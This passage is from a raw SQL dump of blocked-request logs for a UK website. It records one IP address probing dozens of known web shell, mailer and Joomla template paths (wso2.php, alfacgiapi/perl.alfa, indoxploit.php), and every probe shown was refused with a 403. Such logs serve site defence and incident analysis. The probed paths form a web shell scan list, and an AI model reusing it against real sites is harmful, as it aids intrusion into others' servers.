6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','wmUoE9H8BLekOnXtbNMZ1GFx',0,1674319283.4882,138,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/leafmailer2.8.php?http://equalitywalk.org.uk/leafmailer2.8.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','DPBY0jS2HAXx9a3Ey1odUpfI',0,1674319290.7897,127,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/olu.php?http://equalitywalk.org.uk/olu.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','ZW35uQocvBfDXzhyNgdlC7Fx',0,1674319293.0343,543,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/alexusmailer%202.0.php?http://equalitywalk.org.uk/alexusmailer%202.0.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','Eb3AnNHV50rtDjfWKCxgcvkF',0,1674319294.6461,232,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/rss.php?http://equalitywalk.org.uk/rss.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','qxGB3kX9PUNIpC04bHFl1hcE',0,1674319296.9491,142,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/alexus-mailer.php?http://equalitywalk.org.uk/alexus-mailer.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','oWHm7yg9iN62CeXPaA1Z4JxS',0,1674319300.9191,139,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/wp-file.php?http://equalitywalk.org.uk/wp-file.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','DIuoAYPZl8imTLhR56zqpfVM',0,1674319304.0350,141,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/wso2.php?http://equalitywalk.org.uk/wso2.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','K01ahLvCfVjQYIg5MocDRrl8',0,1674319306.0066,161,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/wso1.php?http://equalitywalk.org.uk/wso1.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','sbfjlSCzHL4k1YW0PceKJ3MN',0,1674319307.9120,228,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/olux.php?http://equalitywalk.org.uk/olux.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','Z9KOazbiQdG4flR0C5seTYh7',0,1674319310.0641,163,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/wp-info.php?http://equalitywalk.org.uk/wp-info.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','rTvMeAtkjxng1y2imlOsY3wq',0,1674319311.7021,153,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/xl.php?http://equalitywalk.org.uk/xl.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','Jk6g7X81jR9LBM5NIscnWU4w',0,1674319313.8896,117,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/wp-confiig.php?http://equalitywalk.org.uk/wp-confiig.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','aEB5WRhzyJQqXGrPeMIOpVfL',0,1674319317.6077,126,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/file-manager.php?http://equalitywalk.org.uk/file-manager.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','7gNSqACyuWbFso1tcwdDEV9v',0,1674319320.0740,146,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/uploader.php?http://equalitywalk.org.uk/uploader.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','HMNFs4dq2WIBLx90X58ZPODc',0,1674319323.6492,190,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/leafmailer.php?http://equalitywalk.org.uk/leafmailer.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','G8nEhp5Pkb2l0wSNW6ZJoTHd',0,1674319326.5043,522,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/ALFA_DATA/alfacgiapi/perl.alfa?http://equalitywalk.org.uk/ALFA_DATA/alfacgiapi/perl.alfa','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','KMSwI59gbCaP6ipUXjoYLOky',0,1674319329.7908,133,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/.well-known/ALFA_DATA/alfacgiapi/perl.alfa?http://equalitywalk.org.uk/.well-known/ALFA_DATA/alfacgiapi/perl.alfa','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','zupKWQvctwALbZShxNg0yG5i',0,1674319332.9766,220,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/tmp_images/alfacgiapi/perl.alfa?http://equalitywalk.org.uk/tmp_images/alfacgiapi/perl.alfa','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','LJPpT6CONQUWwV1ogbhu9dDG',0,1674319337.9240,286,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/wp-admin/alfacgiapi/perl.alfa?http://equalitywalk.org.uk/wp-admin/alfacgiapi/perl.alfa','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','CaAGgY4xEdfhSV2Qontclkey',0,1674319340.7730,174,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/wp-includes/alfacgiapi/perl.alfa?http://equalitywalk.org.uk/wp-includes/alfacgiapi/perl.alfa','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','AejBh7Hz3OPdYMynQ4Fkg6UZ',0,1674319349.8626,135,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/alfacgiapi/perl.alfa?http://equalitywalk.org.uk/alfacgiapi/perl.alfa','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','QwZA0LN6FGirzlB7onjk2eHK',0,1674319353.4875,117,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/css/ALFA_DATA/alfacgiapi/perl.alfa?http://equalitywalk.org.uk/css/ALFA_DATA/alfacgiapi/perl.alfa','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','9h1uAgwHsBDje7ynUZSa5Mm4',0,1674319355.8926,114,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/files/ALFA_DATA/alfacgiapi/perl.alfa?http://equalitywalk.org.uk/files/ALFA_DATA/alfacgiapi/perl.alfa','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','3JRcEw8a1BQyhzAvXOk4l6KG',0,1674319361.0777,355,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/images/ALFA_DATA/alfacgiapi/perl.alfa?http://equalitywalk.org.uk/images/ALFA_DATA/alfacgiapi/perl.alfa','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','0rVP9IdhEkgYf6cQDoKH7ajy',0,1674319363.6198,113,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/ALFA_DATA/alfacgiapi/perl.alfa%22?http://equalitywalk.org.uk/ALFA_DATA/alfacgiapi/perl.alfa%22','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','kOBS0fqiM8oacDRNhXQV5sJH',0,1674319366.7977,124,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/wp-admin/ALFA_DATA/alfacgiapi/perl.alfa?http://equalitywalk.org.uk/wp-admin/ALFA_DATA/alfacgiapi/perl.alfa','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','nGFIEkAP3taNixrYC84WOZTp',0,1674319368.8637,172,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/wp-includes/ALFA_DATA/alfacgiapi/perl.alfa?http://equalitywalk.org.uk/wp-includes/ALFA_DATA/alfacgiapi/perl.alfa','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','mHQPR4TJkN7abU0gI1LBxnWF',0,1674319376.1566,152,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/date.php?http://equalitywalk.org.uk/date.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','cy7bkGUmBh3giNWSJu6MpdoK',0,1674319383.0864,195,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/about.php?http://equalitywalk.org.uk/about.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','AhoY8rD5C1gfwz7BkxlqunvF',0,1674319387.8166,138,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/alfaindex.php?http://equalitywalk.org.uk/alfaindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','zFmJSEMu70rApdlbUHh51YeC',0,1674319390.4143,141,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/.alf.php?http://equalitywalk.org.uk/.alf.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','IVv37PcQl5KoL2gumrB9aTyh',0,1674319393.4481,104,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/snd.php?http://equalitywalk.org.uk/snd.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','3yDhoITaqsUgFZx8QezrXCVB',0,1674319408.7682,136,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/wp-class.php?http://equalitywalk.org.uk/wp-class.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','V6IthjNvaM2pKb8Um7lCei9Q',0,1674319412.3362,109,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/small.php?http://equalitywalk.org.uk/small.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','ODB9tujvNqSm1XyTUE8Iz3lh',0,1674319415.2307,131,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/Marvins.php?http://equalitywalk.org.uk/Marvins.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','NynBXMcdq6tJ9OowL7QP2UzI',0,1674319444.2334,239,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/wp-includes/css/modules.php?http://equalitywalk.org.uk/wp-includes/css/modules.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','4hD0pTAESvtcRqkX9CxMY5yJ',0,1674319447.4204,120,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/indoxploit.php?http://equalitywalk.org.uk/indoxploit.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','RKItxcfHi7yWYzAndG3mOuTL',0,1674319448.8924,111,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/modules/mod_simplefileuploadv1.3/elements/udd.php?http://equalitywalk.org.uk/modules/mod_simplefileuploadv1.3/elements/udd.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','MxaL0gtKG7XwF2BhvfySlEbn',0,1674319463.0429,193,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/libraries/joomla/css.php?http://equalitywalk.org.uk/libraries/joomla/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','nhB28JDzyFesvQk50PTwRIpW',0,1674319464.4110,180,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/libraries/joomla/jmails.php?u&http://equalitywalk.org.uk/libraries/joomla/jmails.php?u','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','mKBahPecX1MNZW2nyuztg0Yw',0,1674319466.3485,158,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/libraries/joomla/jmail.php?u&http://equalitywalk.org.uk/libraries/joomla/jmail.php?u','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','emGq9XyYQJg3ohvSWHFc1tsr',0,1674319467.8889,386,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/images/vuln.php?http://equalitywalk.org.uk/images/vuln.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','ybXYt8uKLGlUxD6VhpgnmiJC',0,1674319470.1429,187,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/tmp/vuln.php?http://equalitywalk.org.uk/tmp/vuln.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','vo9NlxidTjZEXkORsgBz7SC4',0,1674319472.2482,169,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/rxr.php?rxr&http://equalitywalk.org.uk/rxr.php?rxr','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','U56Rjxgsh19vnrBoFfJbizGw',0,1674319474.4301,172,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/modules/modules/modules.php?http://equalitywalk.org.uk/modules/modules/modules.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','jK6AYNCI0ekXqUbTsJlg1FBR',0,1674319479.5829,770,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/error.php?http://equalitywalk.org.uk/error.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','WDlMpBVHqKdPScU3njtRxLru',0,1674319482.2541,538,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/RxR.php?http://equalitywalk.org.uk/RxR.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','a9PZfg3yGqz0kNIdbMcRY2Wt',0,1674319487.2191,127,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/components/com_b2jcontact/izoc.php?http://equalitywalk.org.uk/components/com_b2jcontact/izoc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','2fTDdUwe1y0YzQKxEg3IVit4',0,1674319491.7515,161,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/administrator/templates/bluestork/error.php?http://equalitywalk.org.uk/administrator/templates/bluestork/error.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','O4zs091Prdb7kqCSNvuMnXEV',0,1674319494.7885,151,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/administrator/templates/hathor/index.php?http://equalitywalk.org.uk/administrator/templates/hathor/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','15JRpyc29FKudjqgELnes6Z4',0,1674319497.9592,146,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/administrator/templates/hathor/error.php?http://equalitywalk.org.uk/administrator/templates/hathor/error.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','LcXjy6rVA5xNRY4MbsWE8TfU',0,1674319503.1896,123,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/administrator/templates/isis/index.php?http://equalitywalk.org.uk/administrator/templates/isis/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','tbIeyBAClEU3d9hjpiDOgGPJ',0,1674319506.6282,101,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/administrator/templates/isis/error.php?http://equalitywalk.org.uk/administrator/templates/isis/error.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','PMhg3E8IcymQiN0xtsDjudlF',0,1674319507.7415,90,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/templates/beez/index.php?http://equalitywalk.org.uk/templates/beez/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','bzdmYqgklN3hJUOZAaHR1suj',0,1674319509.1204,241,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/templates/ja_purity/index.php?http://equalitywalk.org.uk/templates/ja_purity/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','kzY2OdJQ8UnDimwMb6LGvVpe',0,1674319510.7711,90,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/templates/rhuk_milkyway/index.php?http://equalitywalk.org.uk/templates/rhuk_milkyway/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','Ljhq0MeOP2mNyET3ZBwadfJ1',0,1674319514.4213,119,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/templates/+theme+/index.php?http://equalitywalk.org.uk/templates/+theme+/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','EcNufCXoR5d0mYbTnaV9UBJQ',0,1674319517.6707,126,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/templates/+theme+/error.php?http://equalitywalk.org.uk/templates/+theme+/error.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','GTqNdhycexSnB5zwRVM3Cari',0,1674319522.2350,136,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/templates/beez3/index.php?http://equalitywalk.org.uk/templates/beez3/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','Jwd6CQLW78ZjuahtzkT9MieI',0,1674319524.6230,121,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/templates/beez3/error.php?http://equalitywalk.org.uk/templates/beez3/error.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','as9X620t7EOUzMAmdwNcyouG',0,1674319530.9074,169,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/templates/beez5/index.php?http://equalitywalk.org.uk/templates/beez5/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','sIq0o75RfMAESKa2pZWY8dOw',0,1674319532.7739,125,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/templates/beez5/error.php?http://equalitywalk.org.uk/templates/beez5/error.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','8xf02p1nCBwYMVNU3Xzme9yE',0,1674319536.2797,126,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/templates/beez_20/index.php?http://equalitywalk.org.uk/templates/beez_20/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','Ren4jzmJTDVFUdaA1QHl0Mv3',0,1674319541.6944,127,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/templates/beez_20/error.php?http://equalitywalk.org.uk/templates/beez_20/error.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','OdAbGQ90jkvsnLSMBmEiYy67',0,1674319543.9081,123,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/templates/protostar/index.php?http://equalitywalk.org.uk/templates/protostar/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','tdJoxbQHOPw1R3ZcaBCusGvI',0,1674319546.5601,124,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/templates/protostar/error.php?http://equalitywalk.org.uk/templates/protostar/error.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','qdaiRfpg8FIx12BZsmKArvGN',0,1674319550.2375,105,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/templates/atomic/index.php?http://equalitywalk.org.uk/templates/atomic/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','Gei3hXp9lW5z4wgjoY6rDHt2',0,1674319553.6348,112,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/templates/atomic/error.php?http://equalitywalk.org.uk/templates/atomic/error.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 